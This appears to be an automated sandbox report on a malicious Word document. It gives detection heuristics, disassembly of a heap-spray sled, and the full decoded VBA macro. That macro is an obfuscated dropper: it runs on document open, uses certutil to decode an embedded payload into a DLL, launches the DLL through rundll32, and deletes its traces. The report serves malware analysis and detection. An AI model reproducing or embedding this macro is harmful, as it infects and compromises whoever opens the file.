MALICIOUS
258
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic
The sample is a malicious Microsoft Word document that exploits the CVE-2007-3899 vulnerability, a known memory corruption flaw. The presence of a Document_Open macro and references to the CreateProcess API indicate that the macro is designed to execute arbitrary code. The heap spray and NOP sled heuristics further support the exploitation of a memory corruption vulnerability.
Heuristics 9
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
ClamAV: Doc.Malware.Sagent-9761959-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-9761959-0
-
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly0001A916 41 inc ecx 0001A917 41 inc ecx 0001A918 41 inc ecx 0001A919 41 inc ecx 0001A91A 41 inc ecx 0001A91B 41 inc ecx 0001A91C 41 inc ecx 0001A91D 41 inc ecx 0001A91E 41 inc ecx 0001A91F 41 inc ecx 0001A920 41 inc ecx 0001A921 41 inc ecx 0001A922 41 inc ecx 0001A923 41 inc ecx 0001A924 41 inc ecx 0001A925 41 inc ecx 0001A926 41 inc ecx 0001A927 41 inc ecx 0001A928 41 inc ecx 0001A929 41 inc ecx 0001A92A 41 inc ecx 0001A92B 41 inc ecx 0001A92C 41 inc ecx 0001A92D 41 inc ecx 0001A92E 41 inc ecx 0001A92F 41 inc ecx 0001A930 41 inc ecx 0001A931 41 inc ecx 0001A932 41 inc ecx 0001A933 41 inc ecx 0001A934 41 inc ecx 0001A935 41 inc ecx 0001A936 41 inc ecx 0001A937 41 inc ecx 0001A938 41 inc ecx 0001A939 41 inc ecx 0001A93A 41 inc ecx 0001A93B 41 inc ecx 0001A93C 41 inc ecx 0001A93D 41 inc ecx 0001A93E 41 inc ecx 0001A93F 41 inc ecx 0001A940 41 inc ecx 0001A941 41 inc ecx 0001A942 41 inc ecx 0001A943 41 inc ecx 0001A944 41 inc ecx 0001A945 41 inc ecx 0001A946 41 inc ecx 0001A947 41 inc ecx 0001A948 41 inc ecx 0001A949 41 inc ecx 0001A94A 41 inc ecx 0001A94B 41 inc ecx 0001A94C 41 inc ecx 0001A94D 41 inc ecx 0001A94E 41 inc ecx 0001A94F 41 inc ecx 0001A950 41 inc ecx 0001A951 41 inc ecx 0001A952 41 inc ecx 0001A953 41 inc ecx 0001A954 41 inc ecx 0001A955 41 inc ecx 0001A956 41 inc ecx 0001A957 41 inc ecx 0001A958 41 inc ecx 0001A959 41 inc ecx 0001A95A 41 inc ecx 0001A95B 41 inc ecx 0001A95C 41 inc ecx 0001A95D 41 inc ecx 0001A95E 41 inc ecx 0001A95F 41 inc ecx 0001A960 41 inc ecx 0001A961 41 inc ecx 0001A962 41 inc ecx 0001A963 41 inc ecx 0001A964 41 inc ecx 0001A965 41 inc ecx 0001A966 41 inc ecx 0001A967 41 inc ecx 0001A968 41 inc ecx 0001A969 41 inc ecx 0001A96A 41 inc ecx 0001A96B 41 inc ecx 0001A96C 41 inc ecx 0001A96D 41 inc ecx 0001A96E 41 inc ecx 0001A96F 41 inc ecx 0001A970 41 inc ecx 0001A971 41 inc ecx 0001A972 41 inc ecx 0001A973 41 inc ecx 0001A974 41 inc ecx 0001A975 41 inc ecx
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x41 bytes
Disassembly
Attempted x86 opcode disassembly0001A621 41 inc ecx 0001A622 41 inc ecx 0001A623 41 inc ecx 0001A624 41 inc ecx 0001A625 41 inc ecx 0001A626 41 inc ecx 0001A627 41 inc ecx 0001A628 41 inc ecx 0001A629 41 inc ecx 0001A62A 41 inc ecx 0001A62B 41 inc ecx 0001A62C 41 inc ecx 0001A62D 41 inc ecx 0001A62E 41 inc ecx 0001A62F 41 inc ecx 0001A630 41 inc ecx 0001A631 41 inc ecx 0001A632 41 inc ecx 0001A633 41 inc ecx 0001A634 41 inc ecx 0001A635 41 inc ecx 0001A636 41 inc ecx 0001A637 41 inc ecx 0001A638 41 inc ecx 0001A639 41 inc ecx 0001A63A 41 inc ecx 0001A63B 41 inc ecx 0001A63C 41 inc ecx 0001A63D 41 inc ecx 0001A63E 41 inc ecx 0001A63F 41 inc ecx 0001A640 41 inc ecx 0001A641 41 inc ecx 0001A642 41 inc ecx 0001A643 41 inc ecx 0001A644 41 inc ecx 0001A645 41 inc ecx 0001A646 41 inc ecx 0001A647 41 inc ecx 0001A648 41 inc ecx 0001A649 41 inc ecx 0001A64A 41 inc ecx 0001A64B 41 inc ecx 0001A64C 41 inc ecx 0001A64D 41 inc ecx 0001A64E 41 inc ecx 0001A64F 41 inc ecx 0001A650 3441 xor al, 0x41 0001A652 41 inc ecx 0001A653 41 inc ecx 0001A654 41 inc ecx 0001A655 41 inc ecx 0001A656 3466 xor al, 0x66 0001A658 7567 jne 0x1a6c1 0001A65A 3441 xor al, 0x41 0001A65C 7441 je 0x1a69f 0001A65E 6e outsb dx, byte ptr [esi] 0001A65F 4e dec esi 0001A660 49 dec ecx 0001A661 626742 bound esp, qword ptr [edi + 0x42] 0001A664 54 push esp 0001A665 4d dec ebp 0001A666 306856 xor byte ptr [eax + 0x56], ch 0001A669 47 inc edi 0001A66A 6870637942 push 0x42796370 0001A66F 7763 ja 0x1a6d4 0001A671 6d insd dword ptr es:[edi], dx 0001A672 396e63 cmp dword ptr [esi + 0x63], ebp 0001A675 6d insd dword ptr es:[edi], dx 0001A676 46 inc esi 0001A677 7449 je 0x1a6c2 0001A679 47 inc edi 0001A67A 4e dec esi 0001A67B 68626d3576 push 0x76356d62 0001A680 64 .byte 0x64
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() Module1.NkmoA -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Private Function DGrIwBoic(S As String) As String DGrIwBoic = Environ$(S) & Application.PathSeparator & "N5uIJVSp" End Function -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5115 bytes |
SHA-256: 50b14759c8935fb40cd334d3c762f0d46f0fd21a9276b64b32d418271015e09d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Module1.NkmoA
End Sub
Attribute VB_Name = "Module1"
Private Type WsRs0y
t6nZZZL4 As Long: bzWF8cAxW As Long: OUCyrzh As Long: h9kn6tE7T As Long
End Type
Private Type x0mlD777fR
nuprnuX As Long: QxfURjck As String: uo6VH7 As String: xMAbY0 As String: Ad6oi As Long
OACsb As Long: sOSQF As Long: aNQ7jC1qd As Long: TOqbEKy6kn As Long: GBI7VPTB As Long
nmG2Jca As Long: B0SQwB4yl As Long: UWx47whVF As Integer: cyMwJzuK As Integer: jDOnI As Integer
oUxwN9B As Long: gyteOufC As Long: JoYDY As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function SetCapture Lib "user32" (ByVal VwQeXW3x As LongPtr) As LongPtr
Private Declare PtrSafe Function SetCaretBlinkTime Lib "user32" (ByVal QT4gIx As LongPtr) As LongPtr
Private Declare PtrSafe Function SetCaretPos Lib "user32" (ByVal kTThi6ogY As LongPtr, _
ByVal udaeOA As LongPtr) As LongPtr
Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" (ByVal XejW0V3vY As String, _
ByVal J4RhSY As String, ByVal dBtMHO As Long, ByVal IQkvEp4iw1 As Long, _
ByVal Yy7ZRG4U As LongPtr, ByVal uN5WJK09 As LongPtr, ByVal PIIiG As Long, _
ByVal cHOMWJAb As String, o6A6mI0 As x0mlD777fR, STAeUYh2uv As WsRs0y) As LongPtr
Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal AJcqtEHAiq As Long) As Long
Private Declare PtrSafe Function SetClassLongA Lib "user32" (ByVal m5JPchgFK As LongPtr, _
ByVal pAWbR As LongPtr, ByVal vYUEecyn As LongPtr) As LongPtr
Private Declare PtrSafe Function SetClassWord Lib "user32" (ByVal CbHOJb As LongPtr, _
ByVal jo1Yvob9OE As LongPtr, ByVal impsx3 As LongPtr) As LongPtr
#Else
Private Declare Function CreateProcessA Lib "Kernel32" (ByVal TRI0AOk6v As String, ByVal Kmh36 As String, _
ByVal NOPGi3iTt1 As Long, ByVal vnqCO0kI As Long, ByVal Hc6nmpdkX As Long, _
ByVal A1vO8bhJDw As Long, ByVal xOaF2c As Long, ByVal Y9QTCYJM As String, _
LrEd4VXk7F As x0mlD777fR, W8VCJpXb As WsRs0y) As Long
Private Declare Function Sleep Lib "Kernel32" (ByVal EE1llLmFN As Long) As Long
Private Declare Function SetCapture Lib "user32" (ByVal uf9a5u8 As Long) As Long
Private Declare Function SetClassLongA Lib "user32" (ByVal c4mu2ZeH As Long, _
ByVal ZerXTd As Long, ByVal Q1XCy8NTq As Long) As Long
Private Declare Function SetClassWord Lib "user32" (ByVal MMbidpgyl As Long, _
ByVal jZ3XfB As Long, ByVal OpN3NNgzvv As Long) As Long
#End If
Private ZRyGV
Private AAAA
Private BBBB
Public Function NkmoA()
ZRyGV = DGrIwBoic(MQpR2UGXn9("HOLIRUSUHVX"))
j0uQ3dhEF (ZRyGV)
HQKgx (ZRyGV)
End Function
Private Function j0uQ3dhEF(ZRyGV As String)
ActiveDocument.SaveAs2 FileName:=ZRyGV + ".xls", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=ZRyGV + ".doc", FileFormat:=wdFormatText
End Function
Private Function HQKgx(ZRyGV As String)
ZRyGV = DGrIwBoic(MQpR2UGXn9("HOLIRUSUHVX"))
ABC (ZRyGV)
End Function
Private Function ABC(ZRyGV As String)
WJuUtxJ = " " & MQpR2UGXn9("hgrfhg0") & " " + ZRyGV + ".xls " + ZRyGV + MQpR2UGXn9("oog1")
Sb9etGDP0T = MQpR2UGXn9("h{h1olwxwuhf_56phwv|V_vzrgqlZ_=F")
Dim Fne9Hx As x0mlD777fR: Dim ic0uG As WsRs0y
If CreateProcessA(Sb9etGDP0T, WJuUtxJ, 0, 0, False, &H8, 0, MQpR2UGXn9("_=F"), Fne9Hx, ic0uG) Then
Sleep 5000
BCD (ZRyGV)
Else
ActiveDocument.Close
End If
End Function
Private Function BCD(ZRyGV As String)
Dim Aki5thX As x0mlD777fR: Dim FffkQzJ As WsRs0y
uN8mpOOqFN = MQpR2UGXn9("h{h156oogqxu_56phwv|V_vzrgqlZ_=F")
If CreateProcessA(uN8mpOOqFN, " " & ZRyGV + MQpR2UGXn9("4U/oog1"), 0, 0, False, 0, 0, MQpR2UGXn9("_=F"), Aki5thX, FffkQzJ) Then
Kill ZRyGV + ".xls"
Sleep 4000
Kill ZRyGV + MQpR2UGXn9("oog1")
End If
End Function
Private Function DGrIwBoic(S As String) As String
DGrIwBoic = Environ$(S) & Application.PathSeparator & "N5uIJVSp"
End Function
Function MQpR2UGXn9(Aki5thX As String) As String
MQpR2UGXn9 = YOxYOcH0w(jU6vF3(Aki5thX, Len(Aki5thX), 1), Len(Aki5thX), 3)
End Function
Public Function jU6vF3(FffkQzJ As String, WJuUtxJ As Long, CiaxhQp As Long) As String
AAAA = FffkQzJ
For Sb9etGDP0T = 1 To WJuUtxJ
Mid$(AAAA, Sb9etGDP0T, 1) = Mid$(FffkQzJ, WJuUtxJ - Sb9etGDP0T + CiaxhQp, 1)
Next
jU6vF3 = AAAA
End Function
Public Function YOxYOcH0w(Fne9Hx As String, FffkQzJ As Long, WJuUtxJ As Long) As String
For Aki5thX = 1 To FffkQzJ
BBBB = Oozl5UCb6(Mid$(Fne9Hx, Aki5thX, 1))
Mid$(Fne9Hx, Aki5thX, 1) = BBBB
Next
YOxYOcH0w = Fne9Hx
End Function
Private Function A9Z4SY(Fne9Hx As Long) As String
A9Z4SY = Chr(Fne9Hx)
End Function
Private Function Oozl5UCb6(Fne9Hx As String) As String
Oozl5UCb6 = A9Z4SY(Asc(Fne9Hx) - 3)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.